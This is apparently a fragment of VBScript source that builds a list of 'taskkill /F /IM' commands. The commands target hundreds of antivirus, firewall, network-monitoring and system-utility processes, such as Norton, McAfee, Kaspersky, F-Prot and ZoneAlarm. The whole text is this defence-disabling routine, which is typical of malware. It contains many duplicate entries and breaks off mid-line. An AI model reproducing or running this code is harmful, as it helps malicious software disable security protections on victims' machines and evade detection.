Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95_0.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ecengine.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""esafe.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""espwatch.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-agnt95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-stopw.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""findviru.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fprot.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""frw.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamapp.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamserv.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmasn.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmavsp.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""icload95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""icloadnt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""icmon.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsupp95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsuppnt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""iface.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""iomon98.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""jedi.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown2000.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""lookout.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""moolive.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpftray.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""n32scanw.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapw32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""navlu32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""navnt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""navw32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""navwnt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisum.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nmain.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""normist.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvc95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""padmin.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavcl.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavsched.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavw.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pccwin98.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcfwallicon.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""persfw.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7win.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""safeweb.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""scanpm.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""scrscan.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""serv95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""smc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""sphinx.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweep95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""tbscan.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""tca.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-98.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-nt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vettray.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscan40.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsecomr.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vshwin32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsstat.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""webscanx.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wfindv32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonealarm.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgserv.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgserv9.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avguard.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgw.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkpop.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkserv.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkservice.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkwctl9.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avltmain.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avnt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpcc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpdos32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpm.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avptc32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsched32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsynmgr.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwinnt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupsrv.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxmonitor9x.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxmonitornt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxquar.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxquar.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""backweb.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""bargains.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""bd_professional.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""beagle.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""belt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""bidef.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""bidserver.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""bipcp.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""bipcpevalsetup.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""bisp.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackd.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackice.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""blss.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""bootconf.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""bootwarn.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""borg2.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""bpc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""brasil.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""bs120.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""bundle.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""bvt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccapp.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccevtmgr.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccpxysvc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cdp.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfd.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfgwiz.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiadmin.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95cf.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""clean.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner3.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleanpc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""click.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmd.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmd32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmesys.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmgrdian.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmon016.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""connectionmonitor.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpd.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpf9x206.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpfnt206.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ctrl.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cv.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cwnb181.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""cwntdwmo.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""datemanager.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""dcomx.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""defalert.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""defscangui.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""defwatch.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""deputy.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""divx.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""dllcache.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""dllreg.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""doors.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpf.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpfsetup.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpps2.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""drwatson.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""drweb32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""drwebupw.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""dssagent.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95_0.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ecengine.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""efpeadm.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""emsw.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ent.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""esafe.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""escanhnt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""escanv95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""espwatch.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ethereal.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""etrustcipe.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""evpn.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""exantivirus-cnet.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""exe.avxw.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""expert.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""explore.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fameh32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fast.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fch32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fih32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""findviru.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""firewall.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fnrb32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fprot.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win_trial.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""frw.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsaa.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav530stbyb.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav530wtbyb.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsgk32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsm32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsma32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsmb32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-stopw.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""gator.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""gbmenu.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""gbpoll.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""generics.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""gmt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""guard.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""guarddog.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""hacktracersetup.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""hbinst.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""hbsrv.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""hotactio.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""hotpatch.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""htlog.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""htpatch.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""hwpe.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""hxdl.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""hxiul.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamapp.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamserv.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamstats.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmasn.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmavsp.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""icloadnt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""icmon.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsupp95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsuppnt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""idle.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""iedll.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""iedriver.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""iexplorer.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""iface.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ifw2000.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""inetlnfo.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""infus.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""infwin.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""init.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""intdel.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""intren.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""iomon98.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""istsvc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""jammer.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""jdbgmrg.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""jedi.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavlite40eng.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavpers40eng.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavpf.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""kazza.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""keenvalue.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-pf-213-en-win.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-wrl-421-en-win.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-wrp-421-en-win.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""kernel32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""killprocesssetup161.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""launcher.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldnetmon.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldpro.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldpromenu.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldscan.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""lnetinfo.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""loader.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""localnet.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown2000.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""lookout.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""lordpe.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""lsetup.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""luau.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""lucomserver.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""luinit.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""luspt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mapisvc32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcagent.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcmnhdlr.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcshield.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mctool.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcupdate.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcupdate.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcvsrte.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcvsshld.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""md.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfin32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfw2en.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfweng3.02d30.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgavrtcl.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgavrte.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mghtml.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgui.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""minilog.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mmod.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""monitor.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""moolive.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mostat.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpfagent.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpfservice.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpftray.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mrflux.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""msapp.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""msbb.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""msblast.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mscache.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""msccn32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mscman.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""msconfig.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""msdm.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""msdos.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""msiexec16.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""msinfo32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mslaugh.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""msmgt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""msmsgri32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mssmmc32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mssys.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""msvxd.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mu0311ad.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""mwatch.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""n32scanw.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nav.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""navap.navapsvc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapsvc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapw32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""navdx.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""navlu32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""navnt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""navstub.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""navw32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""navwnt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nc2000.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ncinst4.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ndd32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""neomonitor.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""neowatchlog.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""netarmor.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""netd32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""netinfo.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""netmon.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""netscanpro.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""netspyhunter-1.2.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""netstat.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""netutils.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisserv.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisum.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nmain.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nod32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""normist.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""norton_internet_secu_3.0_407.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""notstart.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""npf40_tw_98_nt_me_2k.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""npfmessenger.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nprotect.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM 